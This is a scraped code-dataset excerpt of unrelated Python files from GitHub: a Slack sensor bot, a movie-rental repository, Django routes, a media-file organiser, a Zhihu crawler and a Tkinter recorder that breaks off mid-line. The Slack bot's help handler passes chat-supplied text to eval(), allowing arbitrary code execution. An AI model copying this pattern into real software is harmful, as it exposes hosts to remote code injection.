os.environ['TARGET_DEVICE'] != device_name):\n return\n post = slackmq(os.environ['API_TOKEN'],\n message.body['channel'], message.body['ts'])\n if not post.ack():\n return\n username = settings.servers.wirelesstags.username\n password = settings.servers.wirelesstags.password\n api = wirelesstagpy.WirelessTags(username=username,\n password=password)\n sensors = api.load_tags()\n for (uuid, tag) in sensors.items():\n message.send(\n 'Loaded sensor: {0}, \\\n temp: {1}, \\\n humidity: {2} \\\n probe taken: {3}'.format(\n tag.name, tag.temperature,\n tag.humidity, tag.time_since_last_update))\n post.unack()\n\n @listen_to('^help (show) (.*)$', re.IGNORECASE)\n def help(message, command, args):\n if (os.environ['TARGET_DEVICE'] != 'all' and\n os.environ['TARGET_DEVICE'] != device_name):\n return\n post = slackmq(os.environ['API_TOKEN'],\n message.body['channel'], message.body['ts'])\n try:\n command = command + args.replace(' ', '_')\n desc = eval(command).__doc__\n except Exception:\n return\n if not post.ack():\n return\n chat.help(desc)\n post.unack()\n","repo_name":"meltaxa/troupe","sub_path":"homeops/wirelesstags.py","file_name":"wirelesstags.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"61"} +{"seq_id":"31265306625","text":"import logging\nfrom typing import Optional\n\nfrom constants import VEGETARIAN\nfrom customer.customers import get_next_customer, get_next_customer_and_curry_number\nfrom customer.happy_customers import get_happy_customers_id\nfrom order.order_processor import update_order\nfrom order.orders import Order\n\nlogging.basicConfig(level=logging.DEBUG)\n\n\ndef prepare_curry(order: Order) -> Optional[list]:\n curries_list: list = [VEGETARIAN for _ in range(order.total_recipe)]\n num_of_happy_customer = 0\n log_updated_information(num_of_happy_customer, order)\n\n while num_of_happy_customer < order.total_customer and len(order.customers_info) > 0:\n next_customer = get_next_customer(order.customers_info)\n if next_customer.num_of_preference <= 0:\n break\n\n next_curry_info, next_customer_info = get_next_customer_and_curry_number(next_customer, order)\n curry_name = next_customer_info[next_curry_info.curry_number]\n curries_list[next_curry_info.curry_number - 1] = curry_name\n num_of_happy_customer, order = update_all_relevant_info(curry_name, next_curry_info,\n num_of_happy_customer, order)\n return curries_list if order.total_customer == num_of_happy_customer else None\n\n\ndef update_all_relevant_info(curry_name, next_curry_info, num_of_happy_customer, order):\n happy_customer_ids = get_happy_customers_id(curry_name, next_curry_info, order)\n num_of_happy_customer += len(happy_customer_ids)\n order = update_order(order, happy_customer_ids, next_curry_info.curry_number)\n log_updated_information(num_of_happy_customer, order)\n return num_of_happy_customer, order\n\n\ndef log_updated_information(happy_customer: int, order: Order):\n logging.debug(\"customers info - {} - num of customer- {}\".format(order.customers_info, len(order.customers_info)))\n logging.debug(\"meat pref- {} \".format(order.meat_preference))\n logging.debug(\"veg pref- {} \".format(order.veg_preference))\n logging.debug(\"happy customer- {} \".format(happy_customer))\n","repo_name":"imsazzad/curry_wholesaler","sub_path":"app/curry/curry_maker.py","file_name":"curry_maker.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73630887235","text":"import operator\r\nfrom Entities import Movie, Client, Rental\r\nfrom errors import RepoError\r\nimport pickle\r\nfrom pickle import dump\r\n\r\nclass repoMovies(object):\r\n\r\n @staticmethod\r\n def check_string(list_item, search_term):\r\n search_term = search_term.casefold()\r\n list_item = list_item.casefold()\r\n if str(search_term) not in str(list_item):\r\n return False\r\n else:\r\n return True\r\n\r\n def __init__(self):\r\n self._movie_list = []\r\n\r\n def size(self):\r\n return len(self._movie_list)\r\n\r\n def add(self, obj):\r\n if obj in self._movie_list:\r\n raise RepoError(\"Id already exists !\\n\")\r\n self._movie_list.append(obj)\r\n\r\n def remove(self, obj):\r\n if obj not in self._movie_list:\r\n raise RepoError(\"Movie not available for removing !\")\r\n else :\r\n self._movie_list.remove(obj)\r\n\r\n def getMovie(self,id):\r\n valid = 1\r\n for movie in self._movie_list:\r\n if movie.get_movie_id() == id:\r\n return movie\r\n if valid == 1:\r\n raise RepoError(\"Movie does not exist !\")\r\n\r\n def check_movie(self, movie):\r\n if movie not in self._movie_list:\r\n raise RepoError(\"Not a valid movie id \")\r\n\r\n def update_movie(self, movie, new_movie):\r\n if movie not in self._movie_list:\r\n raise RepoError(\"Movie not in list !\")\r\n index = self._movie_list.index(movie)\r\n self._movie_list[index] = new_movie\r\n\r\n def get_all(self):\r\n return self._movie_list[:]\r\n #--------------SEARCHING--------------------\r\n\r\n def search_id(self, string):\r\n __search_list = []\r\n for movie in self._movie_list:\r\n m_id = movie.get_movie_id()\r\n if repoMovies.check_string(m_id, string):\r\n __search_list.append(movie)\r\n if len(__search_list) == 0:\r\n raise RepoError(\"Movie not found !\")\r\n else:\r\n return __search_list\r\n\r\n def search_title(self, string):\r\n __search_list = []\r\n for movie in self._movie_list:\r\n title= movie.get_title()\r\n if repoMovies.check_string(title, string):\r\n __search_list.append(movie)\r\n if len(__search_list) == 0:\r\n raise RepoError(\"Movie not found !\")\r\n else:\r\n return __search_list\r\n\r\n def search_desc(self, string):\r\n __search_list = []\r\n for movie in self._movie_list:\r\n desc = movie.get_desc()\r\n if repoMovies.check_string(desc, string):\r\n __search_list.append(movie)\r\n if len(__search_list) == 0:\r\n raise RepoError(\"Movie not found !\")\r\n else:\r\n return __search_list\r\n\r\n def search_genre(self, string):\r\n __search_list = []\r\n for movie in self._movie_list:\r\n genre = movie.get_genre()\r\n if repoMovies.check_string(genre, string):\r\n __search_list.append(movie)\r\n if len(__search_list) == 0:\r\n raise RepoError(\"Movie not found !\")\r\n else:\r\n return __search_list\r\n\r\n def delete_list(self):\r\n self._movie_list.clear()\r\n\r\n #---------------STATS---------------\r\n\r\n def movie_stats(self):\r\n if len(self._movie_list) != 0:\r\n top_list = sorted(self._movie_list, key=lambda obj:obj.get_movie_stats(), reverse = True)\r\n return top_list\r\n else:\r\n raise RepoError(\"Can not do a top because movie list is empty !\")\r\n\r\n #----------------GENERATE-------------\r\n def generate_movies(self):\r\n file = open(\"Random/Movies.txt\", \"r\")\r\n movies = file.readlines()\r\n file.close()\r\n for movie in movies:\r\n movie = movie.split(\",\")\r\n m_id = movie[0]\r\n m_title = movie[1]\r\n m_desc = movie[2]\r\n m_genre = movie[3]\r\n self._movie_list.append(Movie(m_id, m_title, m_desc, m_genre, True, 0))\r\n\r\nclass repoClients(object):\r\n\r\n def __init__(self):\r\n self._client_list = []\r\n\r\n def size(self):\r\n return len(self._client_list)\r\n\r\n def add(self, obj):\r\n if obj in self._client_list:\r\n raise RepoError(\"Id already exists !\\n\")\r\n self._client_list.append(obj)\r\n\r\n def remove(self, obj):\r\n if obj not in self._client_list:\r\n raise RepoError(\"Client not available for removing !\")\r\n else :\r\n self._client_list.remove(obj)\r\n\r\n def getClient(self,id):\r\n valid = 1\r\n for client in self._client_list:\r\n if client.get_client_id() == id:\r\n valid = 0\r\n return client\r\n if valid == 0:\r\n raise RepoError(\"Client does not exist !\")\r\n\r\n def check_client(self, client):\r\n if client not in self._client_list:\r\n raise RepoError(\"Not a valid client id ! \")\r\n\r\n def update_client(self,client, new_client):\r\n if client not in self._client_list:\r\n raise RepoError(\"Client not in list !\")\r\n index = self._client_list.index(client)\r\n self._client_list[index] = new_client\r\n\r\n def get_all(self):\r\n return self._client_list[:]\r\n #---------------SEARCH---------------\r\n\r\n def search_id(self, string):\r\n __search_list = []\r\n for client in self._client_list:\r\n c_id = client.get_client_id()\r\n if repoMovies.check_string(c_id, string):\r\n __search_list.append(client)\r\n if len(__search_list) == 0:\r\n raise RepoError(\"Client not found !\")\r\n else:\r\n return __search_list\r\n\r\n def search_name(self, string):\r\n __search_list = []\r\n for client in self._client_list:\r\n name = client.get_name()\r\n if repoMovies.check_string(name, string):\r\n __search_list.append(client)\r\n if len(__search_list) == 0:\r\n raise RepoError(\"Client not found !\")\r\n else:\r\n return __search_list\r\n\r\n def delete_list(self):\r\n self._client_list.clear()\r\n\r\n #-----------------STATS-----------------\r\n\r\n def client_stats(self):\r\n if len(self._client_list) != 0:\r\n top_list = sorted(self._client_list, key = lambda obj:obj.get_stats(), reverse = True)\r\n return top_list\r\n else:\r\n raise RepoError(\"Can not do a top because client list is empty !\")\r\n\r\n #----------------GENERATE-------------\r\n def generate_clients(self):\r\n file = open(\"Random/Clients.txt\", \"r\")\r\n clients = file.readlines()\r\n file.close()\r\n for client in clients:\r\n client = client.split(\",\")\r\n c_id = client[0]\r\n c_name = client[1]\r\n self._client_list.append(Client(c_id, c_name, 0))\r\n\r\nclass repoRentals(object):\r\n\r\n def __init__(self):\r\n self._rental_list = []\r\n self._late_rental = []\r\n\r\n def get_rentals(self):\r\n return self._rental_list\r\n\r\n def get_all(self):\r\n return self._rental_list[:]\r\n\r\n def verify_valid(self, client_id, date):\r\n for rent in self._rental_list:\r\n if rent.get_client_id() == client_id:\r\n if str(rent.get_due()) < str(date):\r\n raise RepoError(\"Client has passed their due date for a rented movie !\")\r\n\r\n def remove_rental(self, rent):\r\n self._rental_list.remove(rent)\r\n\r\n def add_rental(self, rental):\r\n if rental in self._rental_list:\r\n raise RepoError(\"Rental already in list\")\r\n self._rental_list.append(rental)\r\n\r\n def rental_stats(self):\r\n if len(self._late_rental) != 0:\r\n top_list = sorted(self._late_rental, key = lambda obj:obj.get_late_days(), reverse = True)\r\n return top_list\r\n else:\r\n raise RepoError(\"Can not do a top because rental list is empty !\")\r\n\r\n def late_movies(self, rental):\r\n self._late_rental.append(rental)\r\n\r\n #------------GENERATE---------------\r\n\r\n def generate_rentals(self):\r\n pass\r\n \"\"\" \r\n file = open(\"Random/Rentals.txt\", \"r\")\r\n rentals = file.readlines()\r\n file.close()\r\n for rental in rentals:\r\n rental = rental.split(\",\")\r\n r_id = rental[0]\r\n m_id = rental[1]\r\n c_id = rental[2]\r\n r_date = rental[3]\r\n r_due = rental[4]\r\n self._rental_list.append(Rental(r_id, m_id, c_id, r_date, r_due, None, 0))\r\n \"\"\"\r\n\r\nclass Undo_redo(object):\r\n #add , remove, update, rent, return\r\n def __init__(self):\r\n self.__undo_list = []\r\n self.__redo_list = []\r\n\r\n def get_action(self):\r\n if len(self.__redo_list) == 0:\r\n raise RepoError(\"can not undo anymore !\")\r\n else:\r\n return self.__redo_list[-1]\r\n\r\n def add_action(self, action):\r\n self.__redo_list.append(action)\r\n\r\n def copy_undo_action(self):\r\n self.__undo_list.append(self.__redo_list[-1])\r\n self.__redo_list.pop()\r\n\r\n def get_undo(self):\r\n return self.__undo_list[:]\r\n\r\n def get_undo_action(self):\r\n if len(self.__undo_list) == 0:\r\n raise RepoError(\"No undo operations were performed ! \")\r\n else:\r\n return self.__undo_list[-1]\r\n\r\nclass pickle_repoMovies(object):\r\n\r\n def __init__(self, file):\r\n self.__file = file\r\n\r\n def __load_movies(self):\r\n file = open (self.__file, \"rb\")\r\n try:\r\n movie_list = pickle.load(file)\r\n except Exception:\r\n movie_list = []\r\n file.close()\r\n return movie_list[:]\r\n\r\n def __store(self, movie_list):\r\n file = open(self.__file, \"wb\")\r\n pickle.dump(movie_list, file)\r\n file.close()\r\n\r\n def size(self, movie_list):\r\n return len(movie_list)\r\n\r\n def add(self, obj):\r\n movies = self.__load_movies()\r\n if obj in movies:\r\n raise RepoError(\"Movie already in list !\")\r\n movies.append(obj)\r\n self.__store(movies)\r\n\r\n def remove(self, obj):\r\n movies = self.__load_movies()\r\n if obj not in movies:\r\n raise RepoError(\"Movie not in list !\")\r\n for i in range(len(movies)):\r\n if movies[i] == obj:\r\n del movies[i]\r\n break\r\n self.__store(movies)\r\n\r\n def getMovie(self,id):\r\n movies = self.__load_movies()\r\n for movie in movies:\r\n if movie.getID() == id:\r\n return movie\r\n raise RepoError(\"Movie not in list! \")\r\n\r\n def update_movie(self, movie, new_movie):\r\n movies = self.__load_movies()\r\n if movie not in movies:\r\n raise RepoError(\"Movie does not exist ! \")\r\n for i in range(len(movies)):\r\n if movies[i] == movie:\r\n movies[i] = new_movie\r\n break\r\n self.__store(movies)\r\n\r\n def get_all(self):\r\n movies = self.__load_movies()\r\n return movies[:]\r\n\r\n def generate_movies(self):\r\n pass\r\n\r\nclass file_repoMovies:\r\n\r\n def __init__(self,file):\r\n self.__file = file\r\n\r\n def __load_movies(self):\r\n file = open (self.__file, \"r\")\r\n movies = file.readlines()\r\n movie_list = []\r\n for movie in movies :\r\n movie.strip()\r\n movie = movie.replace(\"\\n\", \"\")\r\n movie = movie.split(\",\")\r\n movie_list.append(Movie(str(movie[0]),str(movie[1]),str(movie[2]),str(movie[3]),bool(movie[4]),int(movie[5])))\r\n file.close()\r\n return movie_list\r\n\r\n def __store(self, movie_list):\r\n file = open(self.__file, \"w\")\r\n for movie in movie_list:\r\n file.write(str(movie.get_movie_id() + \",\" + movie.get_title() + \",\" + movie.get_desc() + \",\" + movie.get_genre() + \",\" + movie.get_availability() + \",\" + movie.get_movie_stats()+\"\\n\"))\r\n file.close()\r\n\r\n def size(self, movie_list):\r\n return len(movie_list)\r\n\r\n def add(self, obj):\r\n movies = self.__load_movies()\r\n if obj in movies:\r\n raise RepoError(\"Movie already in list ! \")\r\n movies.append(obj)\r\n self.__store(movies)\r\n\r\n\r\n def remove(self, obj):\r\n movies = self.__load_movies()\r\n if obj not in movies:\r\n raise RepoError(\"Movie not in list !\")\r\n for i in range(len(movies)):\r\n if movies[i] == obj:\r\n del movies[i]\r\n break\r\n self.__store(movies)\r\n\r\n def getMovie(self,id):\r\n movies = self.__load_movies()\r\n for movie in movies:\r\n if movie.get_movie_id() == id:\r\n return movie\r\n raise RepoError(\"Movie not in list! \")\r\n\r\n def update_movie(self, movie, new_movie):\r\n movies = self.__load_movies()\r\n if movie not in movies:\r\n raise RepoError(\"Movie does not exist ! \")\r\n for i in range(len(movies)):\r\n if movies[i] == movie:\r\n movies[i] = new_movie\r\n break\r\n self.__store(movies)\r\n\r\n def get_all(self):\r\n movies = self.__load_movies()\r\n movie_list = []\r\n for movie in range(0,len(movies)):\r\n movie_list.append(movies[movie])\r\n return movie_list[:]\r\n\r\n def generate_movies(self):\r\n pass\r\n\r\nclass pickle_repoClients(object):\r\n\r\n def __init__(self, file):\r\n self.__file = file\r\n\r\n def __load_clients(self):\r\n file = open (self.__file, \"rb\")\r\n try:\r\n client_list = pickle.load(file)\r\n except Exception:\r\n client_list = []\r\n file.close()\r\n return client_list[:]\r\n\r\n def __store(self, client_list):\r\n file = open(self.__file, \"wb\")\r\n pickle.dump(client_list, file)\r\n file.close()\r\n\r\n def size(self, client_list):\r\n return len(client_list)\r\n\r\n def add(self, obj):\r\n clients = self.__load_clients()\r\n if obj in clients:\r\n raise RepoError(\"Client already in list !\")\r\n clients.append(obj)\r\n self.__store(clients)\r\n\r\n def remove(self, obj):\r\n clients = self.__load_clients()\r\n if obj not in clients:\r\n raise RepoError(\"Client not in list !\")\r\n for i in range(len(clients)):\r\n if clients[i] == obj:\r\n del clients[i]\r\n break\r\n self.__store(clients)\r\n\r\n def getClient(self,id):\r\n clients = self.__load_clients()\r\n for client in clients:\r\n if client.get_client_id() == id:\r\n return client\r\n raise RepoError(\"Client not in list! \")\r\n\r\n def update_client(self, client, new_client):\r\n clients = self.__load_clients()\r\n if client not in clients:\r\n raise RepoError(\"Client does not exist ! \")\r\n for i in range(len(clients)):\r\n if clients[i] == client:\r\n client[i] = new_client\r\n break\r\n self.__store(clients)\r\n\r\n def get_all(self):\r\n movies = self.__load_clients()\r\n return movies[:]\r\n\r\n def generate_clients(self):\r\n pass\r\n\r\nclass file_repoClients:\r\n\r\n def __init__(self,file):\r\n self.__file = file\r\n\r\n def __load_clients(self):\r\n file = open (self.__file, \"r\")\r\n clients = file.readlines()\r\n client_list = []\r\n for client in clients :\r\n client.strip()\r\n client = client.replace(\"\\n\", \"\")\r\n client = client.split(\",\")\r\n client_list.append(Client(str(client[0]),str(client[1]),int(client[2])))\r\n file.close()\r\n return client_list\r\n\r\n def __store(self, client_list):\r\n file = open(self.__file, \"w\")\r\n for client in client_list:\r\n file.write(str(client.get_client_id()) + \",\" + str(client.get_name()) + \",\" + str(client.get_stats())+\"\\n\")\r\n file.close()\r\n\r\n def size(self, client_list):\r\n return len(client_list)\r\n\r\n def add(self, obj):\r\n clients = self.__load_clients()\r\n if obj in clients:\r\n raise RepoError(\"Client already in list ! \")\r\n clients.append(obj)\r\n self.__store(clients)\r\n\r\n\r\n def remove(self, obj):\r\n clients = self.__load_clients()\r\n if obj not in clients:\r\n raise RepoError(\"Client not in list !\")\r\n for i in range(len(clients)):\r\n if clients[i] == obj:\r\n del clients[i]\r\n break\r\n self.__store(clients)\r\n\r\n def getClient(self,id):\r\n clients = self.__load_clients()\r\n for client in clients:\r\n if client.get_client_id() == id:\r\n return client\r\n raise RepoError(\"Client not in list! \")\r\n\r\n def update_client(self, client, new_client):\r\n clients = self.__load_clients()\r\n if client not in clients:\r\n raise RepoError(\"Client does not exist ! \")\r\n for i in range(len(clients)):\r\n if clients[i] == client:\r\n clients[i] = new_client\r\n break\r\n self.__store(clients)\r\n\r\n def get_all(self):\r\n clients = self.__load_clients()\r\n client_list = []\r\n for client in range(0,len(clients)):\r\n client_list.append(clients[client])\r\n return client_list[:]\r\n\r\n def generate_clients(self):\r\n pass","repo_name":"Daniele1209/Movie-management-app-Python","sub_path":"repo.py","file_name":"repo.py","file_ext":"py","file_size_in_byte":17408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18557507284","text":"from django.urls import path\nfrom . import views\n\napp_name = 'meals'\n\nurlpatterns = [\n path('', views.dish_list, name='dish_list'),\n path('dish//', views.dish_detail, name='dish_detail'),\n path('add_to_cart//', views.add_to_cart, name='add_to_cart'),\n path('checkout/', views.checkout_view, name='checkout'),\n path('order_confirmation/', views.order_confirmation, name='order_confirmation'),\n path('order//', views.order_details, name='order_details'),\n path('cart/', views.cart_view, name='cart_view'),\n path('create_dish/', views.create_dish, name='create_dish'),\n path('update_dish//', views.update_dish, name='update_dish'),\n path('create_ingredient/', views.create_ingredient, name='create_ingredient'),\n path('create_meal/', views.create_meal, name='create_meal'),\n path('meal_detail//', views.meal_detail, name='meal_detail'),\n path('meal_list/', views.meal_list, name='meal_list'),\n path('approve_meal_plan/', views.meal_plan_approval, name='approve_meal_plan'),\n path('payment//', views.process_payment, name='process_payment'),\n path('meal_plan_confirmation/', views.meal_plan_confirmed, name='meal_plan_confirmed'),\n path('meals_with_dish//', views.meals_with_dish, name='meals_with_dish'),\n path('chef//weekly_meal/', views.chef_weekly_meal, name='chef_weekly_meal'),\n path('api/search_ingredients/', views.api_search_ingredients, name='api_search_ingredients'),\n path('api/create_ingredient/', views.api_create_ingredient, name='api_create_ingredient'),\n path('api/customize_meal/', views.api_customize_meal_plan, name='api_customize_meal'),\n path('api/submit_meal_plan/', views.submit_meal_plan_updates, name='submit_meal_plan_updates'),\n path('api/get_meal_details/', views.get_meal_details, name='get_meal_details'),\n path('api/get_alternative_meals/', views.get_alternative_meals, name='get_alternative_meals'),\n path('view_past_orders/', views.view_past_orders, name='view_past_orders'),\n]\n","repo_name":"performlikemj/neighborhood-united","sub_path":"meals/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35693027795","text":"import shutil;\r\nimport sys;\r\nimport re;\r\nimport os;\r\n\r\n#def clean_up(show_folder):\r\n\r\n#Delves into the subdirectories and orders them into the\r\n#appropriate folders in the show directory\r\ndef organize_directories(download_folder, show_folder, file_types):\r\n for subdir, dirs, files in os.walk(download_folder):\r\n for file in files:\r\n item_list = check_show_and_season(file, file_types);\r\n\r\n if (item_list == None or item_list[1] == None):\r\n continue;\r\n\r\n src = os.path.join(subdir, file);\r\n #src = os.path.abspath(src);\r\n\r\n if(item_list[0] == ''):\r\n item_list[0] = 'Frasier';\r\n\r\n if (int(item_list[1]) > 9):\r\n dest = os.path.join(show_folder, item_list[0], 'Season ' + item_list[1]);\r\n else:\r\n dest = os.path.join(show_folder, item_list[0], 'Season 0' + item_list[1]);\r\n\r\n #dest = os.path.abspath(dest);\r\n if('Sample' in dest):\r\n continue;\r\n\r\n print(dest)\r\n\r\n if not (os.path.exists(dest)):\r\n os.makedirs(dest);\r\n\r\n shutil.copy(src, dest);\r\n\r\n#returns a list that includes the name of the show and\r\n#the season number, returns None if it has no season number\r\n#i.e. if it isn't a show\r\ndef check_show_and_season(item, file_types):\r\n if(item.endswith(file_types)):\r\n item = item.title();\r\n title = clean_title(item);\r\n season = find_season(item);\r\n item_list = [];\r\n\r\n item_list.append(title);\r\n item_list.append(season);\r\n\r\n if(season is None or item_list[1] is None or item_list[1] is '' or item_list[1] is ' '):\r\n return None;\r\n else:\r\n return item_list;\r\n else:\r\n return None;\r\n\r\n#Finds what looks to be the season number and returns its value\r\ndef find_season(item):\r\n season = re.findall('S\\d\\d', item);\r\n if(season is None):\r\n season = re.findall('S\\d', item);\r\n\r\n if(season is None):\r\n season = re.findall('\\d\\d\\d\\d\\s', item);\r\n\r\n if('(' not in season and ')' not in season):\r\n season = str(season);\r\n total = '0';\r\n count = 0;\r\n for i in season:\r\n if(i.isdigit()):\r\n if(int(i) > 0 and count < 2):\r\n total += i;\r\n count += 1;\r\n return total;\r\n\r\n else:\r\n return None;\r\n else:\r\n season = str(season);\r\n total = '0';\r\n for i in season:\r\n if(i.isdigit()):\r\n if(int(i) > 0):\r\n total += i;\r\n\r\n return total;\r\n else:\r\n season = str(season);\r\n total = '';\r\n for i in season:\r\n if(i.isdigit()):\r\n if(int(i) > 0):\r\n total += i;\r\n\r\n return total;\r\n\r\n#Cleans all the rubbish from the title, like season number, periods, 'HDTV', 'XviD' etc.\r\ndef clean_title(item):\r\n item = item.title();\r\n if(\"'\" in item):\r\n item = item.replace(\"'\", '');\r\n item = item.title();\r\n if('.' in item):\r\n item = item.replace('.', ' ');\r\n if('_' in item):\r\n item = item.replace('_', ' ');\r\n if(' - ' in item):\r\n item = item.replace(' - ', ' ');\r\n if('-' in item):\r\n item = item.replace('-', ' ');\r\n if(' ' in item):\r\n item = item.replace(' ', ' ');\r\n if(' ' in item):\r\n item = item.replace(' ', ' ');\r\n if('(' in item):\r\n item = re.sub('(\\(.*)$', '', item);\r\n if('!' in item):\r\n item = item.replace('!', item);\r\n if(re.search('\\d-\\d', item)):\r\n item = re.sub('\\d-\\d', '', item);\r\n if(re.search('Season\\s\\d', item)):\r\n item = re.sub('Season\\s\\d(.*)$', '', item);\r\n if(re.search('S\\d\\d', item)):\r\n item = re.sub('S\\d\\d(.*)$', '', item);\r\n if(re.search('S\\d', item)):\r\n item = re.sub('S\\d(.*)$', '', item);\r\n if(re.search('Season', item)):\r\n item = re.sub('Season(.*)$', '', item);\r\n if(re.search('Sería', item)):\r\n item = re.sub('Sería(.*)$', '', item);\r\n if(re.search('Seria', item)):\r\n item = re.sub('Seria(.*)$', '', item);\r\n if(re.search('\\d\\sSería', item)):\r\n item = re.sub('\\d\\sSería(.*)$', '', item);\r\n if(re.search('Sería\\s\\d', item)):\r\n item = re.sub('Sería\\s\\d(.*)$', '', item);\r\n if(re.search('\\d\\sSeria', item)):\r\n item = re.sub('\\d\\sSeria(.*)$', '', item);\r\n if(re.search('Seria\\s\\d', item)):\r\n item = re.sub('Seria\\s\\d(.*)$', '', item);\r\n if(re.search('\\d\\dX\\d\\d', item)):\r\n item = re.sub('\\d\\dX\\d\\d(.*)$', '', item);\r\n if(re.search('\\d\\d\\d\\d', item)):\r\n item = re.sub('\\d\\d\\d\\d(.*)$', '', item);\r\n\r\n return item.strip();\r\n\r\n#Removes all the empty directories\r\ndef remove_empty_dirs(show_folder):\r\n for subdir, dirs, files in os.walk(show_folder):\r\n for d in dirs:\r\n if not(os.listdir(os.path.join(subdir, d))):\r\n os.removedirs(os.path.join(subdir, d));\r\n return;\r\n\r\ndef main():\r\n file_types = ('.mp4', '.avi', '.mkv', '.mov');\r\n\r\n download_folder, show_folder = sys.argv[1:];\r\n\r\n organize_directories(download_folder, show_folder, file_types);\r\n remove_empty_dirs(show_folder);\r\n return;\r\n\r\nif __name__ == '__main__':\r\n main();","repo_name":"OlafurAO/Python-Course","sub_path":"Forritunarmalid Python/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":5455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43465263627","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@Author : Sy\n@File : hotlist.py\n@Time : 2020/8/16 3:22 下午\n@desc : 爬取知乎热榜,定时推送邮件\n\"\"\"\n\nimport requests\nfrom config.init_config import init_config, read_urls\nimport re\nfrom send_mails import SendMail\nimport time\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/84.0.4147.125 Safari/537.36 '\n}\n\n\ndef crawl_hot_list():\n \"\"\" 读取热榜,发送邮件 \"\"\"\n mail = SendMail()\n for url in read_urls():\n print(f'url:{url}')\n hot_list = []\n # url中带*,直接跳过,可以理解为注解\n if '*' in url:\n continue\n try:\n r = requests.get(url=url, headers=headers).json()\n # 如果是全站,url是total的标识,若不是,其余的是一样的解析\n data_list = r['data']\n for data in data_list:\n target = data['target']\n title = target['title'].encode(\"utf-8\").decode(\"utf-8\") # 标题\n # 问题地址,替换api和questions字段,得到真实地址\n old_url = target['url']\n if 'questions' not in old_url:\n continue\n url = old_url.replace('api', 'www').replace('questions', 'question')\n answer_count = target['answer_count'] # 回答数\n follower_count = target['follower_count'] # 关注数\n detail_text = data['detail_text'].encode(\"utf-8\").decode(\"utf-8\") # 热度\n result_dict = {\n 'title': title,\n 'url': url,\n 'answer_count': answer_count,\n 'follower_count': follower_count,\n 'detail_text': detail_text\n }\n hot_list.append(result_dict)\n except:\n import traceback\n traceback.print_exc()\n continue\n\n result_list = sort(hot_list) # 根据热度排序\n txt = deal_txt(result_list) # 处理文本\n mail.send_mails(txt) # 发邮件\n\n\ndef sort(list_hot):\n \"\"\" sorted 函数排序热度 \"\"\"\n list_hot = sorted(list_hot, key=sort_seed, reverse=True)\n return list_hot\n\n\ndef sort_seed(hot):\n \"\"\" sorted 函数用到的关键词种子,对 '万' 进行处理排序 \"\"\"\n r = re.findall(r'\\d*', hot['detail_text'])\n number = float(r[0])\n if '万' in hot['detail_text']:\n number *= 10000\n return number\n\n\ndef deal_txt(result_list):\n \"\"\" 数据转为文本 \"\"\"\n result_str_list = []\n for result_dict in result_list:\n title = result_dict['title']\n url = result_dict['url']\n answer_count = result_dict['answer_count']\n follower_count = result_dict['follower_count']\n detail_text = result_dict['detail_text']\n result_str = f\"标题: {title}\\n\" \\\n f\"网站地址: {url}\\n\" \\\n f\"回答人数: {answer_count}, \" \\\n f\"关注人数: {follower_count}, \" \\\n f\"热度: {detail_text}\\n\\n\"\n result_str_list.append(result_str)\n result = \"\\n\".join(result_str_list)\n return result\n\n\ndef main():\n begin = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))\n print(f\"{begin}----脚本开始----\")\n init_config()\n crawl_hot_list() # 爬取数据\n end = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))\n print(f\"{end}----脚本结束----\")\n\n\nmain()\n","repo_name":"unlimitbladeworks/python-tools","sub_path":"automation/zhihu-email/hotlist.py","file_name":"hotlist.py","file_ext":"py","file_size_in_byte":3571,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"61"} +{"seq_id":"32473627851","text":"class Dog:\n dogs = [] # specific to entire dog class\n\n def __init__(self, name):\n self.name = name\n self.dogs.append(self)\n\n @classmethod # decorator specify a class method\n def num_dogs(cls): # cls means name of the class\n return len(cls.dogs)\n\n @staticmethod\n def bark(n):\n \"\"\"barks n time\"\"\"\n for n in range(n):\n print(\"Bark!\")\n\n\ntim = Dog(\"Tim\")\njim = Dog(\"Jim\")\nprint(Dog.num_dogs()) # calling a class method\n","repo_name":"sheucke/Pythontutorial","sub_path":"staticMethodsClasses.py","file_name":"staticMethodsClasses.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2243154868","text":"#Run main.py!!!\n\nimport tkinter\nfrom tkinter import *\n\ndef on_closing():\n global running\n running = False\n\n# GUI\nroot = tkinter.Tk()\nroot.protocol(\"WM_DELETE_WINDOW\", on_closing)\nroot.resizable(False, False)\nroot.title(\"Screen Recorder\")\nroot.geometry(\"800x400+500+100\")\ncanvas = Canvas(root, bg=\"#4392F1\", height=400, width=800, bd=0, highlightthickness=0, relief=\"ridge\")\ncanvas.place(x=0, y=0)\nbackground_img = PhotoImage(file=f\"imp_images/final1.png\")\nbackground = canvas.create_image(400.0, 200.0, image=background_img)\nheader = canvas.create_text(400.0, 91.0, text=\"Capture Your screen\", fill=\"#ECE8EF\", font=(\"Roboto-Bold\", int(30.0)))\ncreate_label = canvas.create_text(203.5, 174.5, text=\"create an\", fill=\"#EDFF00\", font=(\"Roboto-Bold\", int(16.0)))\nvideo_label = canvas.create_text(590.5, 174.5, text=\" (15 recom.)fps video\", fill=\"#030303\", font=(\"Roboto-Medium\", int(16.0)))\nswitch = tkinter.Scale(from_=1, to=100, orient=tkinter.HORIZONTAL, length=200, activebackground=\"#000000\"\n , bg=\"#FFC0CB\", highlightcolor=\"#C25993\", highlightbackground=\"#C25993\", fg=\"black\",\n troughcolor=\"white\")\n\nmenubar = Menu(root)\nvideo = Menu(menubar, tearoff=0)\nabout = Menu(menubar, tearoff=0)\nvideo_format 